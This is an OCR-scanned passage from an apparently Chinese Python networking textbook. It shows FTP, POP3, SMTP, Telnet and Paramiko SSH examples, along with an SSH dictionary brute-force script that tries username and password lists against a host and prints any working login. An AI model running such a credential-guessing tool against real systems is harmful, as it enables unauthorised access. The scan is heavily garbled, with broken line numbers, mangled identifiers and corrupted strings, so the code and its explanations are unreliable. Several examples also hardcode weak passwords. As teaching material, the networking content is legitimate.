sendcmd(command) 向 FTP 服务 器 发 送 命令 ,并 返回 一 个 返回 值 
eon 向 FTP 服务 器 发 送 命 令 , 与 sendcmd() 方 法 的 不 同 之 处 是 它 
没有 返回 值 
pwd() 获得 当前 工作 目录 
cwd(path) 改变 当前 工作 目录 
dir([path][...[ ,cb]]) 显示 path 目录 下 的 内 容 
E 用 于 下 载 文本 文件 ,cb() 函 数 为 可 选 的 回调 函数 ,用 于 处 理 文 
retrlines(cmd[ ,cb]) 人 
件 的 每 一 行 
retrbinary(cmd ,cb) 用 于 处 理 二 进 制 文件 ,回调 函数 用 于 处 理 每 一 块 下 载 的 数据 
上 传 文本 文件 ,cmd 类 似 于 STOR filename; filehandle 为 一 文 
storlines(cmd, filehandle) 
件 句 柄 
storbinary(emd,filehandle[ ,bs 一 8192]) ee 人 
rename(old, new) 改 文件 名 
delete( path) 删除 FTP 服务 器 上 的 文件 
mkd( directory) 创建 特定 目录 
rmd(directory) 删除 特定 目录 
quit() 关闭 连接 并 且 退 出 


11.4.3 交互 式 FTP 操作 
命令 行 下 载 : 


>>> import ftplib 
>>> ftp = ftplib. FTP('192.168.1.5') 
>>> ftp. login( 'anonymous', '') 


'230 User logged in, proceed.' 
>>> ftp.dir() 


—Iw—-rw-rw— 1 user group 17 Mar 31 10:50 nomal. txt 
—Iw—-rw-rw— 1 user group 7 Mar 31 09 :55 test. txt 


>>> ftp. retrlines( 'RETR test. txt', open( 'c:\\test. txt', 'w').write) 
'226 Transfer complete. 7 bytes transferred. 0.43 KB/sec.， 
>>> ftp.quit() 


"221 Goodbye，closing session. 


命令 行 上 传 (注意 : FTP 用 户 需要 有 上 传 权 限 ) : 


>>> ftp = FTP('192.168.1.5') 
>>> ftp. login( ‘anonymous', '') 


"230 User logged in，Pproceed. 
>>> ftp.dir() 


—Iw-rw-rw- 1user group 66 Apr 2 08:24 aa. txt 
—Iw-Iw-rw- 1user group 17 Mar 31 10:50 nomal. txt 
—Iw-Iw-rw- 1user group 0 Apr 2 08:12 test. txt 


>>> ftp. delete( 'aa. txt') 


"250 DELE command successful.' 


>>> file = open('c:\\aa.txt', 'r') 
>>> ftp. storlines( 'STOR aa. txt', file) 


'226 Transfer complete. 430,744 bytes transferred. 896.90 KB/sec.' 


>>> file. close() 
>>> ftp. quit() 


"221 Goodbye, closing session.’' 


11.4.4 FTP 程序 示例 
例 [chll 4 4 _ftp.py】 


from ftplib import FTP 
import sys 
import os. path 


FTP 连接 , 下载 、 上 传 示例 


1 
2 
3 
4 
5. class MyFTP(FTP): 
6 
7 
8 
要 


def ConnectFTP( self, remoteHost = '127.0.0.1',\ 


10. remoteport = 21, \ 

生计 loginname = 'anonymous', \ 
12; loginpassword = ""): 

1 ftp= MyFTP() 

14. try: 


15, ftp. connect (remoteHost, remoteport, 600) 


16. 
by 
18. 
19: 
20. 
2 
22. 
23: 
24. 
25, 
26. 
人 
28. 
29. 
30. 
31, 
32: 
393: 
34. 
35。 
36. 
375 
38. 
396 
40. 
41. 
42. 
43. 
44. 
45. 
46. 
47. 
48. 
49. 
50. 
S51, 
52. 
53, 
54. 
S55 
56. 
57, 
58. 
359, 
60. 
61. 
62. 
63、 
64. 
65. 
66. 





print( "连接 成 功 ') 


except Exception as e: 


print("conncet failedl - %s" % e)>> sys. stderr, 
return (0，' 连 接 失败 ') 
else: 
try: 
ftp. login( loginname, loginpassword) 
print(' 登 录 成 功 ') 
except Exception as e: 
print('login failed - $%s' % e) >> sys. stderr, 
return (0, "登录 失败 ') 
else: 
print( 'return 1') 
return (1, ftp) 


def download( self, remoteHost, \ 


remotePort, \ 
loginname, \ 
loginpassword, \ 
remotePath, \ 
localPath) : 
# 连接 到 FTP 服务 器 ,并 检查 返回 的 结果 
res = self. ConnectFTP(remoteHost, remotePort, loginname, loginpassword) 
if(res[0]!= 1): 
print(res[1]) >> sys. stderr, 
sys. exit() 


井 改 变 远程 目录 并 获取 远程 文件 的 大 小 
ftp = res[1] 
ftp. set_pasv(0) 
井 将 FTP 模式 设置 为 被 动 模式 
dires = self. splitpath(remotePath) 
if dires[0]: 
ftp.cwd(dires[0]) # 改 变 远程 工作 目录 
remotefile= dires[1] # 获 取 远 程 文件 名 
print( dires[0] + ''+ dires[1]) 
fsize = ftp. size(remotefile) 
if fsize==0 : 井 本 地 文件 大 小 是 0 


return 


# 检 索 本 地 文件 是 否 存 在 ,获取 本 地 文件 大 小 
lsize=0 
if os. path. exists(localPath): 

lsize= os. stat(localPath). st_size 


if lsize >= fsize: 
print(' 本 地 文件 大 于 等 于 远程 文件 ') 
return 

blocksize = 1024 * 1024 

cmpsize = lsize 

ftp. voidcmd( "TYPE I') 
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Ly conn = ftp.transfercmd( 'RETR ' + remotefile, lsize) 
68. lwrite= open( localPath, 'ab') 

69. while True: 

70. data = conn. recv(blocksize) 

和 if not data: 

12. break 

kk lwrite. write(data) 

74. cmpsize += len(data) 

上 print('— '* 30, 'download process: % .2f% %'% (float(cmpsize)/fsize * 100)), 
76. lwrite. close() 

bb conn. close() 

78. ftp. quit() 

39. 

80. def upload( self, remoteHost, \ 

81. remotePort, \ 

82. loginname, \ 

83. loginpassword, \ 

84. remotepath, \ 

85. localpath, \ 

86. callback = None): 

87. if not os. path. exists( localpath): 

88. print(" 本 地 文件 不 存在 ") 

89. return 

90. self. set_debuglevel(2) 

1. res= self. ConnectFTP( remoteHost, remotePort, loginname, loginpassword) 
92. if res[0]!= 1: 

93, print( res[1]) 

94. sys. exit() 

95. ftp = res[1] 

96. remote = self. splitpath( remotepath) 
97. ftp.cwd(remote[0]) 

98. rsize=0 

99. try: 

100. rsize = ftp. size(remote[1]) 

101. except: 

102. pass 

103. if (rsize== None): 

104. rsize=0 

105. lsize= os. stat(localpath). st_size 
106. print('rsize : %d, lsize : $%d' % (rsize, lsize)) 
107. if (rsize== lsize): 

108. print(' 远 程 文件 大 小 等 于 本 地 的 ') 
109. return 

人 if (rsize< lsize): 

bi localf = open( localpath, 'rb') 
1 localf. seek(rsize) 

ee ftp. voidcmd( 'TYPE I') 

114. datasock="" 

115, Saige 

116, try: 


by print(remote[1]) 
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118. datasock esize = ftp. ntransfercmd("STOR " + remote[1],rsize) 
119. except Exception as 

120. 一 一 一 一 一 一 一 一 一 192.168.1. 5 -一 -一 一 一 一 一 : 和 争 s' 多 e) >> sys.stderr, 
121 return 

122， cmpsize = rsize 

S23; while True: 

124. buf = localf. read(1024 * 1024) 

125. if not len(buf): 

126. print("\r 无 数据 中 断 ') 

127. break 

128. datasock. sendall (buf) 

129. if callback: 

130. callback(buf) 

4133. cmpsize+= len(buf) 

132. print(' 一 '# 30, uploading $% .2f% %'% (float(cmpsize)/lsize * 100)), 
93 if cmpsize == lsize: 

134. print('\rfile size equal break') 
135, break 

136. datasock. close( ) 

137, print(' 关 闭 数据 连接 ') 

138. localf. close() 

139， print(' 关 闭 本 地 文件 句柄 ') 

140. ftp. quit() 

141. 

142. def splitpath( self, remotepath) : 

143. position = remotepath. rfind( '/') 

144. return (remotepath[ :position + 1], remotepath[position +1:]) 
145. if _name_ '_main_': 

146. myftp = MyFTP( ) 

147. myftp. download( remoteHost = '192.168.1.5',\ 
148. remotePort = 21,\ 

149. loginname = 'anonymous', \ 

150. loginpassword = "', \ 

4154， remotePath = 'nomal. txt',\ 

152, localPath= 'C:\\nomal. txt') 
253， myftp. upload( remoteHost = '192.168.1.5',\ 

154. remotePort = 21,\ 

155. loginname = 'anonymous', \ 

156. loginpassword = "',\ 

157. remotepath = 'aa. txt', \ 

158. localpath = 'C:\\aa. txt') 


11.5 收发 电子 邮件 


电子 邮件 是 一 种 用 电子 手段 提供 信息 交换 的 通信 方式 ,是 互联 网 应 用 最 广 的 服务 。 通 
过 网 络 的 电子 邮件 系统 ,可 以 以 非常 低廉 的 价格 (不 管 发 送 到 哪里 ,都 只 需 负担 网 费 )、 非 常 
快速 的 方式 ( 几 秒 内 可 以 发 送 到 世界 上 任何 指定 的 目的 地 ) ,与 世界 上 任何 一 个 角落 的 网 络 
用 户 联 系 。 
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电子 邮件 可 以 是 文字 、 图 像 声音 等 多 种 形式 。 同 时 ,用户 可 以 得 到 大 量 免费 的 新 闻 , 专 
题 邮 件 ,并 实现 轻松 的 信息 搜索 。 电 子 邮 件 的 存在 极 大 地 方便 了 人 与 人 之 间 的 沟通 与 交流 ， 


促进 了 社会 的 发 展 。 


电子 邮件 的 发 送 使 用 SMTP(Simple Mail Transfer Protocol), SMTP 是 维护 传输 秩 
序 ,规定 邮件 服务 器 之 间 进 行 哪些 工作 的 协议 , 它 的 目标 是 可 靠 、 高 效 地 传送 电子 邮件 。 
SMTP 独立 于 传送 子 系统 ,并 且 能 够 接力 传送 邮件 。 

要 从 邮件 服务 器 访问 邮件 ,比较 简单 的 协议 是 POP3(Post Office Protocol-Version 3)， 
通过 TCP 访问 邮件 服务 器 的 110 端口 ,接收 我 们 的 邮件 ; 比较 复杂 的 协议 是 互联 网 报 文 访 
问 协议 第 4 版 本 (Interactive Mail Access Protocol4,IMAP4), 因 它 较为 复杂 ,本 书 不 予 讨 
论 。 下 面 通过 SMTP 发 送 电 子 邮件 ,通过 POP3 接收 电子 邮件 。 

Python 中 提供 了 两 个 模块 ,一 个 为 Poplib, 另 一 个 为 Smtplib, 通 过 这 两 个 模块 就 可 以 


发 送 和 接收 电子 邮件 了 。 


1 


Poplib 模块 简介 


Poplib 模块 中 的 POP3 类 提供 了 接收 电子 邮件 的 功能 , 它 的 方法 如 表 11-2 所 示 。 


方 ”法 


表 11-2 ”Poplib 的 方法 
描 述 





POP3(host[, port[, timeout]]) 


POP3 类 原型 。host 为 POP3 服务 器 ; port 为 服务 器 端口 ,默认 为 110 





getwelcome() 


获得 邮件 服务 器 的 欢迎 信息 





user(username) 


向 POP3 邮件 服务 器 发 送 用 户 名 。username 为 用 户 名 





pass_(password) 


向 POP3 邮件 服务 器 发 送 密 码 。password 为 密码 





set_debuglevel(level) 


设置 调试 级 别 ,level 为 调试 级 别 





stat() 


请 求 服务 器 发 回 关于 邮箱 的 统计 资料 ,如 邮件 总 数 和 总 字 节 数 





list(which) 


获取 邮件 内 容 列 表 





retr(which) 


获取 指定 的 邮件 ,which 为 指定 要 获取 的 邮件 





uidl([which]) 


返回 邮件 的 唯一 标识 符 ,POP3 会 话 的 每 个 标识 符 都 将 是 唯一 的 





dele( which) 


删除 指定 的 邮件 





top(which, howmuch) 





收取 邮件 部 分 内 容 。which 为 指定 要 获取 的 邮件 ; howmuch 为 指定 
收取 的 行 数 


各 邮件 服务 器 的 地 址 、 端 口 等 参数 设置 各 不 相同 ,如 126 邮箱 的 地 址 是 pop. 126. com， 
端口 默认 值 为 110; 163 邮箱 的 地 址 是 pop. 163. com, 端 口 默认 值 也 是 110; QQ 邮箱 的 地 址 
是 pop. qq. com, 端 口 默 认 值 是 995。 下 面 是 使 用 POP3 接收 邮件 的 示例 代码 。 


例 [chll_5_1_poplib. py】 


import poplib 
import email 


TTAOUUAODp 


def decode str(s): 


from email. parser import Parser 
from email. header import decode header 
from email. utils import parseaddr 





value, charset = decode header(s)[0] 
if charset: 

value = value. decode(charset) 
return value 


. def guess_charset(msg) : 


charset = msg.get charset() 
if charset is None: 
content type = msg.get('Content ~ Type', '').lower() 
pos = content type.find('charset = ') 
if pos >= 0: 
charset = content type[pos+8:].strip() 
return charset 


. def print_info(msg) : 


for header in ['From', 'To', 'Subject']: 
value = msg.get(header, '') 
if value: 
if header == "Subject': 
value = decode str(value) 
else: 
hdr, addr = parseaddr(value) 
name = decode str(addr) 
value = name + '<'+ addr + '> 
print(header + ':' + value) 
for part in msg. walk( ): 
filename = part.get filenanme() 
content type = part.get content type() 
charset = guess_charset(part) 
if filename: 
filename = decode str(filename) 
data = part.get payload(decode = True) 
if filename != None or filename != ”: 
print('Accessory: ' + filename) 
savefile(filename, data, mypath) 


else: 
email content type = "" 
content = "" 
if content type == 'text/plain': 
email content type = "text'" 
elif content type == 'text/html': 
email content type = 'html' 
if charset: 
content = part.get payload(decode = True).decode(charset) 
print(email content type + ''+ content) 


# 输 入 邮件 地 址 ,口令 和 POP3 服务 器 地 址 


. email = input('Email: ') 
. password = input('Password: ') 
. pop3_server = input('POP3 server: ') 


# 连 接 到 POP3 服务 器 


. popserver = poplib.POP3(pop3_server) 


井 可 以 打开 或 关闭 调试 信息 
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60. popserver. set_debuglevel(1) 


61. 井 可 选 : 打印 POP3 服务 器 的 欢迎 文字 
62. print(popserver. getwelcome()) 


63， 井 进行 身份 认证 
64. popserver.user(email) 
65. popserver.pass (password) 


66. #stat() 返 回 邮件 数量 和 占用 空间 


67. stat = popserver. stat() 
68. print('Messages: %s. Size: 


70. index = stat[0] 

71. lines = popserver. retr( inde: 
72, ‘1ists: = [} 

73. fore in lines: 

74. lists. append(e. decode( ) 


%s' $% popserver. stat()) 


x)[1] 


) 


75. msg_content = '\r\n'. join(lists) 


76. msg = Parser().parsestr(msg 


_content) 


78，# lines 存储 了 邮件 的 原始 文本 的 每 一 行 


79.# 可 以 获得 整个 邮件 的 原始 文 


81. print info(msg) 
82. #msg_content = lines 


83，# 稍 后 解析 出 邮件 


本 


85，# 可 以 根据 邮件 索引 号 直接 从 服务 器 删除 邮件 


86. 井 popserver. dele( index) 


88， 井 关闭 连接 
89. popserver. quit() 


11.5.2 Smtplib 模块 发 送 


电子 邮件 


发 送 电 子 邮 件 一 般 使 用 SMTP,Python 中 有 Smtplib 模块 使 用 SMTP 发 送 电 子 邮 件 。 


表 11-3 简介 了 Smtplib 的 方法 。 


方 ”法 


表 11-3 Smtplib 的 方法 
描 述 





SMTP([host[, port[, local_hostname 
[，timeout]]]]) 


SMTP 类 原型 。host 为 邮件 服务 器 名 ; port 为 服务 器 端口 ; 
local_hostname 为 本 地 主机 名 ,为 可 选 参数 





connect(host, port) 


连接 邮件 服务 器 。host 为 连接 的 服务 器 名 ; port 为 服务 器 端 
口 ,为 可 选 参数 





login(user, password) 


使 用 用 户 名 和 密码 登录 到 邮件 服务 器 。user 为 用 户 名 ; 








password 为 密码 
set_debuglevel(level) 设置 调试 级 别 
docmd(cmd[ ，argstring]) 向 邮件 服务 器 发 送 cmd 命令 





sendmail(from_addr, to_addrs, msg[» 


mail_options, rcpt_options]) 


发 送 电子 邮件 。from_addr 为 发 送 者 邮箱 地 址 ; to_addr 为 接 
收 者 的 地 址 ; msg 为 邮件 内 容 ; mail_options 为 可 选 参数 , 邮 
件 ESMTP 操作 ; rcpt_options 为 可 选 参 数 ,RCPT 操作 
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各 服务 器 的 地 址 及 设置 各 不 相同 ,126 邮箱 的 地 址 是 smtp. 126. com, 默 认 端 口 是 25; 
163 邮箱 的 地 址 是 smtp. 163. com ,默认 端口 是 25; QQ 邮箱 的 地 址 是 smtp. qq. com, 上 默认 
端口 是 465 或 587 。 

例 [chl11 5 2_smtplib. py】 


import smtplib 
from email. mime. text import MIMEText 


subject = input(' 邮 件 主 题 :') 

toaddr = input('to:') 

fromaddr = input('from:') 

content = input( "邮件 内 容 : ') 

msg = MIMEText(content) 

# 使 用 email. mime. text. MIMEText() 方 法 构造 一 封 邮件 


. password = 'zhx3.1415926' 
. msg['Subject'] = subject 
. msg[ 'From'] = fromaddr 

. msg['To'] = toaddr 


. # Send the message via our own SMTP server. 

. S = smtplib.SMTP('smtp.126.com',25) 

. Ss.set debuglevel(1) 

.# 把 SMTP 的 调试 级 别 设置 为 1, 可 以 看 到 服务 器 返回 信息 
, Ss.login(fromaddr, password) 

.# 用 发 邮件 的 账号 和 密码 进行 登录 

. 5.send message(msg) 

。# 发 送 邮件 

. s.quit() 

， 井 退出 


11.6 实现 Telnet 远程 登录 


Telnet 是 TCP/IP 协议 簇 中 的 一 员 , 是 互联 网 远程 登录 服务 的 标准 协议 和 主要 方式 。 
它 为 用 户 提供 了 在 本 地 计算 机 上 登录 远程 主机 ,并 在 远程 主机 上 完成 工作 的 能 力 。 在 终端 
使 用 者 的 计算 机 上 使 用 Telnet 程序 连接 到 远程 Telnet 服务 器 。 终 端 使 用 者 可 以 在 Telnet 
程序 中 输入 命令 ,这 些 命令 会 在 服务 器 上 运行 ,就 像 直接 在 服务 器 的 控制 台 上 输入 一 样 。 要 
开始 一 个 Telnet 会 话 ,必须 输 入 用 户 名 和 密码 来 登录 服务 器 。Telnet 是 常用 的 控制 远程 服 
务 器 的 方法 之 一 。 


11.6.1 Windows 下 开启 Telnet 服务 


1. Windows 2000/XP/2003/Vista: 默认 已 安装 但 禁止 了 Telnet 服务 

开启 Telnet: 运行 services. msc 打开 服务 管理 ,找到 Telnet 服务 项 设置 其 启动 类 型 为 
“自动 ”或 者 “手动 (更 安全 ,只 在 需要 的 时 候 才 启用 ) ,然后 启动 该 服务 即 可 。 

2. Windows 7 下 安装 Telnet 服务 

Windows 7 下 默认 未 安装 Telnet 服务 ,需要 安装 后 ,才能 使 用 Telnet 服务 器 端 及 客 
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户 端 。 

(1) 安装 Telnet: 在 “开始 "菜单 中 单 击 “ 控 制 面板 ”选项 打开 控制 面板 , 单 击 其 中 的 “ 程 
序 和 功能 ”选项 ,在 打开 的 窗口 左 侧 栏 中 找到 并 单 击 * 打 开 或 关闭 Windows 功能 ”选项 进入 
Windows 功能 设置 对 话 框 。 找 到 并 选中 “Telnet 客户 端 " 和 “Telnet 服务 器 ” 复 选 框 , 最 后 单 
击 “ 确 定 ” 按 钮 稍 等 片刻 即 可 完成 安装 。 

(2) 开启 Telnet: 方法 同 (1)。 


11.6.2 使 用 Python 实现 Telnet 远程 登录 


Python 中 的 Telnetlib 模块 提供 了 通过 程序 访问 Telnet 服务 器 的 功能 ,下 例 演示 了 登 
录 Windows 下 的 Telnet 服务 器 并 进行 操作 的 过 程 。 
例 [ch11.6_2_telnet_ win. py】 


import getpass 
import telnetlib 


2 
2 
本 
4 HOST = "192.168.31.128" 

5, #user = input("Enter your remote account: ") 

6. user = 'Administrator' 

7 #password = getpass. getpass() 

8. password = '123456' 

9. tn = telnetlib.Telnet(HOST) 

10, tn.read until(b"login: ") 

11. tn.write(user.encode('UTF—8') + b"\r\n") 

12. if password: 

3 tn. read until(b"password: ") 

14. tn. write(password. encode( 'UTF -8') + b"\r\n") 
15. tn.read until(b'>') 

16. tn.write(b"dir\r\n") 

17. tn.write(b"exit\r\n") 

18. output = tn.read all() 

19. myoutput = output. decode(coding) 

20. print(myoutput) 


程序 运行 结果 : 


dir 
驱动 器 C 中 的 卷 没 有 标签 。 
卷 的 序列 号 是 3C52 - BB4C 
C:\Documents and Settings\Administrator 的 目录 
2015=06= 15 -17:27 ‘<DIR> 
2015-04-15 17:27 <DIR> Re 
2015-05-03 13:39 <DIR> .idlerc 
2012-08-3015:47 <DIR> Favorites 
2013-08-01 18:45 <DIR> My Documents 
2012-08-3015:39 <DIR> "开始 ,菜单 
2015—05—=03.15:32 <DIR> 桌面 

D0 个 详 件 0 字 节 

7 个 目录 10,942,320, 640 可 用 字 节 
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11.7 使 用 Python 登录 SSH 服务 器 


Telnet 是 较 早 的 协议 ,在 网 络 中 使 用 Telnet 传输 的 数据 包 是 明文 的 ,这 样 很 不 安全 ,后 
来 出 现 了 SSH。SSH 为 Secure Shell 的 缩写 ,由 IETF 的 网 络 工作 小 组 (Network Working 
Group) 所 制定 ; SSH 为 建立 在 应 用 层 和 传输 层 基 础 上 的 安全 协议 。SSH 是 目前 较 可 靠 , 专 
为 远程 登录 会 话 和 其 他 网 络 服务 提供 安全 性 的 协议 。 利 用 SSH 可 以 有 效 防止 远程 管理 过 
程 中 的 信息 泄露 问题 。SSH 最 初 是 UNIX 操作 系统 上 的 一 个 程序 ,后 来 又 迅速 扩展 到 其 他 
操作 平台 。SSH 在 正确 使 用 时 可 弥补 网 络 中 的 漏洞 。SSH 客户 端 适用 于 多 种 平台 。 

传统 的 网 络 服务 程序 ,如 FTP、POP 和 Telnet 在 本 质 上 都 是 不 安全 的 ,因为 它们 在 网 
络 上 用 明文 传送 口令 和 数据 ,别有用心 的 人 非常 容易 就 可 以 截获 这 些 口 令 和 数据 。 而 且 , 这 
些 服 务 程序 的 安全 验证 方式 也 是 有 其 弱点 的 ,就 是 很 容易 受到 “中 间 人 "攻击 。SSH 有 很 多 
功能 , 它 既 可 以 代替 Telnet, 又 可 以 为 FTP.POP, 甚 至 为 PPP 提供 一 条 安全 的 “通道 ”。 

SSH 的 验证 方式 有 基于 口令 的 安全 验证 和 基于 密 匙 的 安全 验证 ,显然 ,第 一 种 方式 较 
为 简单 ,而 安全 性 较 低 ; 而 第 二 种 方式 较为 复杂 ,安全 性 较 高 。 

能 够 进行 SSH 登录 的 开发 工具 包 有 许多 ,这 里 会 介绍 Paramiko、Spur 等 工具 ,最 后 介 
绍 Python 下 较 流行 的 通过 SSH 用 于 运 维 的 Fabric。 


11.7.1 使 用 Paramiko 模块 


Paramiko 是 纯 Python 的 SSHv2 客户 端 工具 ,适用 于 Python 2.6 十 和 Python 3. 3 十 ， 
可 以 实现 远程 命令 执行 .文件 传输 和 中 间 SSH 代理 。 进 行 远程 安全 连接 时 ,可 以 使 用 密码 
认证 和 公 钥 认证 等 认证 方式 。paramiko 的 官网 为 http://www. paramiko. org/, 源 代码 网 
址 为 https://github. com/paramiko/paramiko/ ，Paramiko 的 安装 方法 为 


> pip install paramiko 


1. SSHClient 类 

Paramiko 包括 两 个 核心 类 ,一 个 为 SSHClient 类 ; 另 一 个 为 SFTPClient 类 。SSHClient 
类 封装 了 传输 、 通 道 以 及 SFTPClient 类 的 认证 ,连接 的 建立 等 方法 ,通常 用 于 执行 远程 命 
令 。SSHClient 类 封装 的 主要 方法 有 以 下 几 种 。 

1) load_system_host_keys() 方 法 

该 方法 加 载 本 地 的 公 钥 认证 信息 ,Linux 下 默认 位 置 为 一 /. ssh/known_hosts。 该 方法 
的 定义 为 

load_ system host keys(self, filename = None) 


filename 指定 远程 主机 公 钥 记录 文件 。 

2) set_missing_host_key_policy() 方 法 

该 方法 指定 在 没有 远程 主机 密 钥 或 Hostkeys 对 象 时 的 策略 ,目前 支持 以 下 策略 。 

2 AutoAddPolicy: 自动 添加 主机 名 及 主机 密码 到 HostKeys 对 象 ,并 将 其 保存 ,即使 
一 /. ssh/known_hosts 文件 不 存在 ,也 不 受 影响 ,不 依赖 于 load_system_host_keys() 
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2 RejectPolicy: 拒绝 未 知 的 主机 名 和 密 钥 ,依赖 于 load_system_host_keys() 方 法 。 

2 WarningPolicy: 未 知 主机 名 和 密 钥 连接 时 ,会 接受 它 , 但 未 知 主机 会 收 到 警告 。 

3) exec_command() 方 法 

exec_command() 方 法 用 于 执行 远程 命令 ,该 方法 包含 三 个 对 象 : stdin 为 标准 输入 ; 
stdout 为 标准 输出 ; error 为 错误 对 象 。 

下 面 为 连接 SSH 服务 的 示例 : 

例 [chl11 .7 1_ssh. py】 
import paramiko 
client = paramiko. SSHClient() 
client. set missing host key policy(paramiko. AutoAddPolicy()) 
client. connect('192.168. 31.130', 22, username = 'root', password = '123456', timeout = 4) 
stdin, stdout, stderr = client.exec command('ls —1') 
for std in stdout. readlines(): 

print(std,end ="'') 
client. close() 


程序 运行 结果 : 


OMAWODr 


a . 1 root root 2196 3 月 17 17:15 anaconda - ks. cfg 
-IW-r--r--. 1 root root 56314 3 月 17 17:15 install.log 
—IWw-r--r--. 1 rootroot11940 3 月 17 17:14 install. 1og. syslog 


PP> 


使 用 Paramiko 字典 爆破 SSH 账号 : 
例 [chll 7 1_ ssh_ dc.py】 


1. #!/usr/bin/env python 

2. 井 -*#* 一 coding:utf 一 8 一 # 一 

3， 

4. import sys 

5. import os 

6. import time 

7. try: 

8 from paramiko import SSHClient 

9 from paramiko import AutoAddPolicy 
10. import paramiko 

11. except ImportError: 

19; print( ' 您 需要 安装 paramiko 模块 。) 
13. sys. exit(1) 


14. docs = """ 

15. [* ] 本 程序 仅 用 于 教学 目的 ,否则 后 果 自 负 。 

16. [* ] 用 法 : python chl1 7_1_ssh dc.py[- Ttarget] [- 了 PPport][-Uuserslist] [—W 
wordlist] [ - H help] 

7 

18. 








19. if sys.platform == 'linux'or sys.platform == 'linux2': 
20. clearing = 'clear’ 

21. else: 

2 clearing = "cls'" 

23. os.system(clearing) 

24. 

25. def gettime(): 

26. print("\n| -—----------------------- [We) 

EF 网 print( " \n[ ~- ] % s\n" % time.ctime()) 

28. return time. time() 

29. 

30. def help(): 

31; print("[* ] -日 -- hostname/ip") 

32; print( "[*]-P -- port") 

33. print( "[* ]-U =--usernamelist") 

34. print( "[*]-P --passwordlist") 

35. print( "[* ] -日 一 help") 

36. print(“"[ * ]Usage:python %s [-Ttarget] [-Pport] [-Uuserslist] [~ Wwordlist] 
[-Hhelp]") 

37. sys.exit(1) 

38. 

39, def dictcrack(hostname, port, username, password) : 

40. ssh = SSHClient() 

41, ssh. set_missing host key policy(AutoAddPolicy()) 
42. try: 

43. ssh. connect ( hostname, port, username, password, pkey = None, timeout = None, 
allow agent = False, look for keys= False) 

44. status = 'ok’ 

45. ssh. close() 

46. except paramiko. ssh_exception. AuthenticationException: 
47. status = "error'" 

48. return status 

49. 

50. def makelist(file): 

Sl, by 

52, 生成 username 和 password 列表 

53, ai 

54. items = [] 

55. try: 

56. fd = open(file, 'r') 

57. except IOError: 

58. print( ' 不 能 读 取 文 件 : \'%s\'' % file) 

30 pass 

60. except Exception: 

61. print( ' 不 知晓 的 错误 ') 

62. pass 

63. 

64. for line in fd.readlines() : 

65. item = line.replace('\n', '').replace('\r', '') 
66. items.append( item) 

67. fd.close() 
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100. 
101. 
102. 
103. 


\n" 


104. 
105. 
106. 
107. 
108. 
109. 
110. 
Lv 
112, 
i113 
114. 
115, 
116. 
3 


except: 


else: 
print("\n[ + ]^ 一 ^ 险 喻 ,找到 了 !!!") 
print("[ + ] username: $%s" % username) 
print("[ + ] password: % s\n" % password) 
sys. exit(1) 


print(" 出 现 异 常 了 ") 


print(" 
endtime 
print(" 


完成 ") 


= gettime() 


共 花 费 $d 秒 " % (endtime - starttime)) 


sys.exit(0) 


return items 
. def main(): 
starttime = gettime() 
try: 
for arg in sys.argv: 
if arg. lower() == '—t'or arg.lower() == '—- target': 
hostname = str(sys.argv[int(sys.argv[1:]. index(arg)) +2]) 
if arg. lower() == '—p'or arg.lower() == '—- port': 
port = int(sys.argv[ int(sys.argv[1:].index(arg))+2]) 
elif arg. lower() == '—u'or arg.lower() == '——- userlist': 
userlist = sys.argv[ int(sys.argv[1:]. index(arg)) +2] 
elif arg. lower() == '—w'orarg.lower() == '—— wordlist': 
wordlist = sys.argv[ int(sys.argv[1:]. index(arg)) +2] 
elif arg. lower() == '—h'or arg.lower() == '—- help': 
help() 
elif len(sys.argv)<= 1: 
help() 
except Exception as e: 
print("[ - ] 检 查 您 输入 的 参数 \n ", e) 
help() 
print("\n[!] 开始 字典 破解 SSE ……\n") 
usernamelist = makelist(userlist) 
passwordlist = makelist(wordlist) 
print("[ * ] SSH 字典 破解 准备 中 ……") 
print( "[* ] %s 用 户 数 据 加 载 ."” % str(len(usernamelist))) 
print("[ * ] %s 密码 数据 加 载 ."”% str(len(passwordlist))) 
print( "[ x ] 开始 字典 破解 ….") 
try: 
for username in usernamelist: 
for password in passwordlist: 
print("\n[ + ]Attempt uaername: $% s password: % s.…" % (username,password) ) 
current = dictcrack(hostname, port, username, password) 
if current == "error': 
print("[ ~ ]0* 0 The username: $% s and password: % s Is Disenbabled… 
外 (username, password)) 
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(可 说明 : 程序 运行 需要 两 个 文件 ,一 个 是 存储 用 户 名 的 文件 , 另 一 个 是 存储 常见 弱 口 
令 的 文件 。 

第 7 一 13 行 ,导入 Paramiko 模块 , 若 产 生 异 常 则 说 明 未 安装 Paramiko。 

第 19 一 23 行 ,清除 屏幕 ,Linux 的 命令 为 clear, Windows 命令 行 下 为 cls。 

第 25 一 28 行 ,gettime() 函 数 打 印 当 前 时 间 , 返 回 时 间 ( 秒 ) 。 

第 30 一 37 行 ,help() 函 数 显示 本 程序 的 帮助 信息 。 

第 39 一 48 行 ,dictcrack() 函 数 实施 字典 破解 ,用 一 组 用 户 名 和 密码 登录 SSH 服务 器 时 
著 产 生 异 常 则 说 明 用 户 名 和 密码 不 正确 ,退回 error; 未 产生 异常 则 说 明 用 户 名 和 密码 正 
确 , 返 回 ok。 

第 50 一 62 行 ,makelist() 函 数 用 于 从 文件 生成 用 户 名 和 密码 的 列表 。 

第 70~114 行 ,main() 函 数 获取 命令 行 参 数 , 调 用 dictcrack() 函 数 进行 字典 破解 。 

2. SFTPClient 类 

SFTPClient 类 是 SFTP 客户 端 工具 ,实现 了 远程 文件 的 上 传 . 下 载 ,权限 .状态 等 操作 。 

1) from_transport() 方 法 

from_transport() 方 法 创建 了 一 个 SFTP 连接 。 方 法 的 定义 为 


from_transport(self，transport_obj) 


transport_obj 为 一 个 已 经 通过 认证 的 传输 对 象 。 
2) put() 方 法 
put() 方 法 把 本 地 文件 上 传 到 SFTP 服务 器 。 方 法 的 定义 为 


put(self, localpath, remotepath, callback = None, confirm= True) 


参数 说 明 : 

9 localpath 指定 准备 上 传 的 本 地 文件 。 

9 remotepath 指定 上 传 后 ,在 远程 存储 的 位 置 及 名 称 。 

9 callback 获取 已 接收 的 字 节 数 和 总 字 节 数 , 以 便 调用 回调 函数 。 

2 confirm 文件 上 传 完 毕 后 ,是否 调用 stat() 方 法 ,以 便 确 认 文 件 的 大 小 。 
3) get() 方 法 

get() 方 法 从 远程 SSH 服务 器 下 载 文件 ,方法 的 定义 为 


get(self, remotepath, localpath, callback = None) 


参数 说 明 : 

9 remotepath 远程 需要 下 载 的 文件 。 

2 localpath 准备 存储 到 本 地 的 路 径 和 文件 名 。 
2 callback 调用 回调 函数 ,默认 值 为 None。 

4) mkdir() 方 法 

